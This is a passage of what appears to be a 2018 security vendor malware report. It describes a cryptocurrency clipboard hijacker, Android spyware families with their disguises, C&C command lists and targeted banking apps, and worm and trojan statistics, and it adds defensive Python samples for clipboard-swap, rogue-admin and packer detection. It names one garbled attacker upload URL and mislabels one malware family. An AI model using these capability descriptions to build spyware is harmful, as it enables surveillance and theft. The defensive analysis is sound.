It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but instead actually steals cryptocurrency, redirecting it to the perpetrator.

Cryptocurrency transfers require a wallet address. The address is a long string of mixed characters and numbers, so it is almost impossible to remember or to type in manually. That is why users usually copy and paste a wallet address to make a transaction. Cybercriminals regard this copy-paste process as a breach they can use to their advantage.

The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it replaces it with the address of a wallet under the attacker's control. So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminals' hands.

New Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses

This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added malicious code. The malicious version of All-Radio 4.27 was used for spreading different types of malware, clipboard cryptocurrency hijackers among them.

Here is an example of a clipboard hijacker attack:

A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.
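The attack works because nothing compares what the user copied with what lands in the transfer form. A wallet application can close that gap by remembering the address it last handed to the clipboard and re-checking the clipboard content at paste time, and by noticing when the address type changes (the report's example swaps a 3... P2SH address for a 1... P2PKH one). The guard below is an added example written for this report, not Comodo's code or code from the All-Radio 4.27 bundle. The clipboard is an in-memory stand-in so the block runs anywhere; the address patterns table is an assumption that covers the two Bitcoin address formats in the report's example plus bech32 and Ethereum addresses, which the report does not mention.

```python
import re

# Prefix-based address patterns (an assumption of this example, not a list
# from the report). Base58 excludes 0, O, I and l; bech32 excludes 1, b, i, o.
ADDRESS_PATTERNS = {
    "btc-p2pkh": re.compile(r"^1[1-9A-HJ-NP-Za-km-z]{25,34}$"),
    "btc-p2sh": re.compile(r"^3[1-9A-HJ-NP-Za-km-z]{25,34}$"),
    "btc-bech32": re.compile(r"^bc1[02-9ac-hj-np-z]{6,87}$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}


def classify_address(text):
    """Return the address family a string looks like, or None."""
    for name, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(text):
            return name
    return None


class ClipboardGuard:
    """Remember what the user copied and verify it right before it is pasted.

    Constructed in-memory stand-in for the OS clipboard. A clipboard hijacker,
    as described in the report, rewrites the address between copy and paste,
    so the guard re-reads the clipboard at paste time and compares.
    """

    def __init__(self):
        self._clipboard = ""   # what is actually on the clipboard now
        self._expected = None  # what the user last placed there

    def user_copies(self, text):
        self._clipboard = text
        self._expected = text

    def simulate_tamper(self, text):
        # Stand-in for something else writing to the clipboard after the copy.
        self._clipboard = text

    def check_before_paste(self):
        """Return (ok, report); ok is False when the clipboard no longer holds what was copied."""
        current, expected = self._clipboard, self._expected
        if current == expected:
            return True, {"status": "unchanged", "type": classify_address(current)}
        return False, {
            "status": "swapped",
            "expected": expected,
            "found": current,
            "expected_type": classify_address(expected),
            "found_type": classify_address(current),
        }


if __name__ == "__main__":
    guard = ClipboardGuard()
    guard.user_copies("3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs")   # address from the report
    guard.simulate_tamper("1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm")  # substituted address from the report
    print(guard.check_before_paste())
```

The check is only as good as the moment it runs: it has to read the clipboard immediately before the paste is committed, which is also why a wallet UI should display the full pasted address for confirmation rather than an abbreviated form.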
An example of a clipboard hijacker attack

Spread of Clipboard Hijacker malware around the world

Although cryptominers have decreased in quantity, they seem to be coming back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors.
4 Android Devices Under Siege

4.1 Spying, Stealing, Mining

Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. It is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers. Today every smartphone contains a plethora of confidential information about its owner.

If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.

Today spying is the number one purpose of Android malware. In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.

The digital spooks
Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection and hone their tradecraft from version to version.

4.1.1 KevDroid

The first is named KevDroid. It is distributed in three versions:

Version-1: Naver Defender
Version-2: Netease Defender
Version-3: PU

Disguises of KevDroid

The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional abilities for spying. It steals account details: contacts, id, name, phone numbers and email address of the owner. It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type) and photos of the contacts. After extracting all the data, the malware encrypts it with the AES algorithm and sends it to the attackers' server httphttpcgalimcomadminhrpupuphpdo=upload.

KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.

The second version, Netease Defender, has additional spying abilities. It takes control over the device camera and covertly records the victim's activity. Then it sends the video to the attackers' server.

Version-3 of KevDroid takes photos, records calls and creates a list of files on the device. It also extracts the web history, account and contact details and the device information.

People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment the spyware constantly kept track of all events on the infected device. Another means of disseminating the malware was social networks.

Version-1: Dardesh, Google Play Services, Instant Apps
Version-2: Settings

Disguises of Desert Scorpion

The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts the metadata and makes changes on the victim device.
4.1.2 Zoo Park

The next member of the spy family, Zoo Park, has 4 different versions:

Version-1: Telegram Groups, انتخاب دھم
Version-2: Postrall, Yes For Referendum, انتخاب دھم
Version-3: Celebs Gone Wild, جریدة النھار الکویتیة, 剑侠挂机
Version-4: VPN Easy, DroFirewall, m_android

Disguises of Zoo Park

The first version tries to impersonate the Telegram app. It extracts Accounts and Contacts details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, network operator name, SDK version, OS version, etc.), call log details and external storage content.

The third version is included in spyware named "Spymaster Pro" and can:

- Enable and disable the GPS services
- Record audio and send it to the Command & Control server
- Upload image files
- Collect information about the applications installed
- Collect the browser's data
- Send SMS and read outgoing SMS

The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.

In addition to the abilities of previous versions, it includes some additional tricks:

- Extracts photos, audio and video
- Records the screen
- Executes shell commands
- Records calls
4.1.3 MikeSpy

Some spyware samples specifically hunt for messengers' data, like the next digital spook, MikeSpy.

Virtual Girlfriend

Disguises of MikeSpy

MikeSpy camouflaged itself as a Virtual Girlfriend application. But instead of a girlfriend, it has a bundle of malicious abilities:

- Takes control over the Bluetooth adapter
- Extracts data about accounts, contact details and installed apps
- Extracts data from the WhatsApp message DB and related keys
- Uploads collected data to the cybercriminals' server via FTP
4.1.4 Xloader

The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.

Version-1 to Version-3: FaceBook, Chrome

Disguises of Xloader

After infection, Xloader connects to its C&C server and executes the following commands:

- Extract the device information
- Delete SMS
- Set ringer mode
- Monitor incoming SMS messages
- Clear memory
- Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs
- Extract contact details
- Set Wi-Fi always turned on

Version 2 can execute additional commands:

- Send SMS and read outgoing SMS
- Enable and disable a Wi-Fi connection
- Access a location specified by the attackers
- Make recordings
- Make calls
4.1.5 Stalker Spy

The next malware in the row is Stalker Spy. As you can see, it is a champion in the number of masks it puts on to deceive users.

App: Distribution
FlexiSpy: MBackup
HelloSpy: ProActivator, TActivator, Setting, Wi-Fi Settings, ردیاب اسپای ھاید, Keylogger, System Service
Mobile Spy: 随意代挂, Subway Surfers, 라이브성인방송, Мобильный антивирус, droidgetlogevent, SmartcardService, Cheats Z, CloudAgent, New Insta Follow, Android CJ, 대한통운 택배, 余生代挂APP, Basic Daydreams, SystemWifiService, Samplecom, мобильный клиент, Asa刷钻

Disguises of Stalker Spy

In addition to the usual must-have spyware set, Xloader can remotely turn on the microphone on the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.
4.1.6 Mystery Bot

The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption, the malware deletes the original files. So we can call it a spy with a "007 license".

Version 1: Adobe Flash Player
Version 2: Flash Player

Disguises of Mystery Bot

Mystery Bot comes under the cover of Adobe Flash Player. Below is a list of some commands that the malware can execute on your device:

- Send_SMS: extract SMS content and send it to the C&C server
- Send_USSD: send the USSD to the C&C server
- Gethistory: monitor browser history
- Start_AllApp: gather info about installed applications
- Send_call: set the Intent action to call
- Forward_call: forward incoming calls
- ResForward_call: reset call forwarding
- Go_Smsmnd: delete SMS content
- Go_GetAlls: get SMS history
- Dell_sms: delete SMS content in a conversation
- Send_spam: send spam SMS
- Start_Inject: call the injectors class
4.1.7 FakeSpy

FakeSpy also has many masks, which you can see in the screenshot.

佐川急便, 현대캐피탈

Disguises of FakeSpy

It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.

Here are some commands from its Command and Control server:

- contacts: get contact details and email id
- Mute: set action to mute
- Mms: get MMS content
- info: get device information
4.1.8 RedAlert

RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

Version 1: EbookReader, Update Flash Player, Android Update, WhatsApp, Viber
Version 2: Update Google Market, Flash Player, Tactic, FlashLight

Disguises of RedAlert

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:

- de.postbank.finanzassistent
- pl.mbank
- aib.ibank.android

The second version can block access to some websites, including Google Chrome, Google Play store, Gmail and YouTube.
4.1.9 Hero Rat

The next digital spook, Hero Rat, mostly acts on Iranian territory. It uses third-party app stores, social networks and messengers for spreading.

Version 1: CloudVPN, MyIrancel, Mtproto, زیـــــبانـــــویس, تلگرام ھمھ کاره, Proxy, دوست یاب, Telegram Ton, شارژ رایگان بگیر, App Master, Anti Rat, PlatformA, فالورگیر نامحدود, اینترنت رایگان

Disguises of Hero Rat

Its code is available on a Telegram hacking channel. Noticeably, it is sold in three options: bronze, silver and gold.

After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts its spying activity. It steals text messages and audio records, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get Free Followers and Telegram versions for the Iranian market.
4.1.10 Sonvpay

The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.

Version 1: Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot, Reccoder-Call, QRCodeBar Scanner APK, Let me love you ringtone, Iphone Ringtone, Night light, Beauty camera-Photo editor, Shape of you ringtone

Disguises of Sonvpay

Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip" option. If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.

It comes to victims in the variety of disguises named above.
4.1.11 CoinHive

And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of them updating its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.

Version-1: Netflix Hack, Instagram Hack
Version-2: TSF Launcher
Version-3: Android Service, PlacarTv Futebol Ao Vivo

Disguises of CoinHive

The malware is covertly propagated via... another cryptominer, named CoinMiner.

How is it possible? Let's imagine a cybercriminal who wants to infect her victims with a cryptominer to utilize their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim too. Thief robbing thief.

This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.
4.2 Android Malware Catalogued by Month

Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

Figure: Android-targeted malware in April (chart; axis ticks not reproduced)

4.2.2 May 2018

Figure: Android-targeted malware in May (chart; axis ticks not reproduced)

4.2.3 June 2018

Figure: Android-targeted malware in June (chart; axis ticks not reproduced)
5 Malware in Q2 2018: The Big Picture

Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections across 237 country-code top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.
5.1 Strategic Threat: Computer Worms

A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 Report we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.
5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.
5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses them from a local area network (LAN) or company intranet.

In Q2 2018 Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.
5.1.3 Email Worms

Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.

This quarter the most common Email Worm by far was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2.
5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects .exe and .scr files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many.
5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.
5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a graphical user interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses

A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.
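The behaviour attributed to Starter, a new local account that is put into the Administrators group moments later, is visible in the Windows Security log as event 4720 (user account created) followed by 4732 (member added to a security-enabled local group; 4728 is the global-group counterpart). The correlation below is an added example written for this report, not Comodo's detection logic. The log lines are constructed in a simplified pipe-separated form rather than a real event export; the time window is an assumption.

```python
from datetime import datetime, timedelta

# Constructed sample events (not a real Windows log export) in the form
# timestamp|event_id|subject|target_account|group. 4720 = user account created,
# 4732 = member added to a security-enabled local group (4728: global group).
SAMPLE_EVENTS = """\
2018-06-04T10:15:02|4720|WORKSTATION$|svcremote|
2018-06-04T10:15:03|4732|WORKSTATION$|svcremote|Administrators
2018-06-04T11:40:11|4720|jdoe|intern01|
2018-06-04T11:45:30|4732|jdoe|intern01|Users
2018-06-05T09:00:00|4732|admin|intern01|Administrators
"""

ACCOUNT_CREATED = 4720
GROUP_MEMBER_ADDED = {4732, 4728}


def parse_events(text):
    """Parse the simplified export into dicts with a real datetime per event."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, subject, target, group = line.split("|")
        events.append({
            "ts": datetime.fromisoformat(ts),
            "id": int(event_id),
            "subject": subject,  # who performed the action
            "target": target,    # the account created or added
            "group": group,
        })
    return events


def find_rogue_admin_creations(events, window=timedelta(minutes=10),
                               group="Administrators"):
    """Flag accounts added to `group` within `window` of being created.

    A legitimate admin account is rarely created and elevated in the same
    minute by a machine account; malware that sets up its own admin user
    (as the report describes for Starter) does exactly that.
    """
    created_at = {}
    alerts = []
    for event in sorted(events, key=lambda e: e["ts"]):
        if event["id"] == ACCOUNT_CREATED:
            created_at[event["target"]] = event["ts"]
        elif event["id"] in GROUP_MEMBER_ADDED and event["group"] == group:
            t0 = created_at.get(event["target"])
            if t0 is not None and event["ts"] - t0 <= window:
                alerts.append({
                    "account": event["target"],
                    "created": t0,
                    "elevated": event["ts"],
                    "by": event["subject"],
                })
    return alerts


if __name__ == "__main__":
    for alert in find_rogue_admin_creations(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

In the sample only svcremote is flagged: intern01 is created, added to Users, and only promoted to Administrators the next day, outside the window. Tune the window to the site's provisioning practice; a SIEM rule would additionally key on the subject being a machine account or the creation happening outside change windows.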
5.2.4 Exploits

Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
5.3 Medium Threat Malware

In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers

Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.

In Q2 2018 Russia was the #1 home to malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
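A stock UPX build is easy to recognise by the strings it leaves in the file (the UPX0/UPX1 section names and the "UPX!" packer header); a modified UPX, which is the point of "MUPX", is usually rebuilt so that those markers are renamed or stripped, and what remains is the statistical signature of compressed data: byte entropy close to 8 bits per byte. The classifier below is an added example written for this report, not Comodo's detection code, and it operates on raw bytes rather than parsing PE headers. The three samples are constructed (deterministic pseudo-random bytes stand in for compressed sections) and the entropy threshold is an assumption.

```python
import hashlib
import math
from collections import Counter


def shannon_entropy(data):
    """Bits per byte: ~8.0 for compressed or encrypted data, plain code usually 5-6.5."""
    if not data:
        return 0.0
    counts = Counter(data)
    total = len(data)
    return -sum(c / total * math.log2(c / total) for c in counts.values())


# Markers a stock UPX build leaves behind: section names and the "UPX!"
# signature in the packer header. A modified UPX (MUPX) typically changes
# or removes them, so their absence proves nothing.
UPX_MARKERS = (b"UPX0", b"UPX1", b"UPX2", b"UPX!")


def classify_packing(blob, entropy_threshold=7.2):
    """Return a verdict plus the evidence: 'upx-stock', 'packed-unknown' or 'unpacked'."""
    markers = [m.decode() for m in UPX_MARKERS if m in blob]
    entropy = shannon_entropy(blob)
    if markers:
        verdict = "upx-stock"
    elif entropy >= entropy_threshold:
        # High entropy with no packer strings: MUPX-style, another packer, or encryption.
        verdict = "packed-unknown"
    else:
        verdict = "unpacked"
    return {"verdict": verdict, "entropy": round(entropy, 2), "markers": markers}


def _pseudo_random(n, seed=b"constructed-sample"):
    """Deterministic high-entropy bytes (stand-in for a compressed section)."""
    out = bytearray()
    block = seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out.extend(block)
    return bytes(out[:n])


# Constructed samples, not real binaries: a DOS stub prefix, then either stock
# UPX section names plus the "UPX!" header, renamed sections with no markers,
# or repetitive plain text standing in for uncompressed code.
SAMPLE_STOCK_UPX = (b"MZ" + b"\x00" * 60 + b"UPX0" + b"\x00" * 36 + b"UPX1"
                    + b"UPX!" + _pseudo_random(2048))
SAMPLE_MUPX = b"MZ" + b"\x00" * 60 + b".text" + b"\x00" * 36 + _pseudo_random(4096)
SAMPLE_PLAIN = b"MZ" + b"\x00" * 60 + b"int main(void) { return 0; }\n" * 100


if __name__ == "__main__":
    for name, blob in (("stock", SAMPLE_STOCK_UPX), ("mupx", SAMPLE_MUPX), ("plain", SAMPLE_PLAIN)):
        print(name, classify_packing(blob))
```

On real files the entropy is better measured per section than over the whole image, since an unpacked binary with a large embedded resource can score high overall; the verdict logic is unchanged, only the input is sliced by the PE section table.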
5.3.3 Email Flooder

Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but still something to be aware of.
5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018 the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are second and third respectively.
This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical analysis
In this section let's examine unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.
Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected in not only one but multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.
In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
